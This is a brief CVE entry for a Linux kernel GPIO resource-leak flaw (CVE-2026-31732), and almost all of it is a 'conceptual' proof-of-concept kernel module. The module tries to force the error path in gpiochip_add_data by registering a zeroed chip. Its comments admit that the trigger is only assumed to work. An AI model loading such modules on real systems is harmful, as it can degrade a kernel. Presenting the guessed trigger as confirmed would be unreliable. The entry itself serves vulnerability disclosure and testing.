CVE-2026-31732 Linux内核GPIO资源泄漏漏洞

/* * Conceptual PoC for CVE-2026-31732 * This kernel module attempts to trigger the error path in * gpiochip_add_data_with_key to demonstrate the resource leak. */ #include <linux/module.h> #include <linux/gpio/driver.h> #include <linux/err.h> static int __init poc_init(void) { struct gpio_chip *chip; int ret; // Allocate and zero out a dummy gpio_chip structure chip = kzalloc(sizeof(*chip), GFP_KERNEL); if (!chip) return -ENOMEM; // Setup minimal required fields to pass initial checks chip->label = "poc_gpio"; chip->ngpio = 0; // Setting invalid or zero values might trigger error paths chip->parent = NULL; chip->owner = THIS_MODULE; // Attempt to add the chip. // If internal initialization fails, it hits the vulnerable error path. ret = gpiochip_add_data(chip, NULL); if (ret) { pr_info("PoC: gpiochip_add_data failed as expected (ret=%d). Resource leak may have occurred.", ret); // In the vulnerable version, resources allocated before this point are leaked. kfree(chip); // Clean up our own allocation return 0; } // If successful, remove it (not the vulnerable path) gpiochip_remove(chip); kfree(chip); return 0; } static void __exit poc_exit(void) { pr_info("PoC module exited."); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("PoC for CVE-2026-31732 GPIO Resource Leak");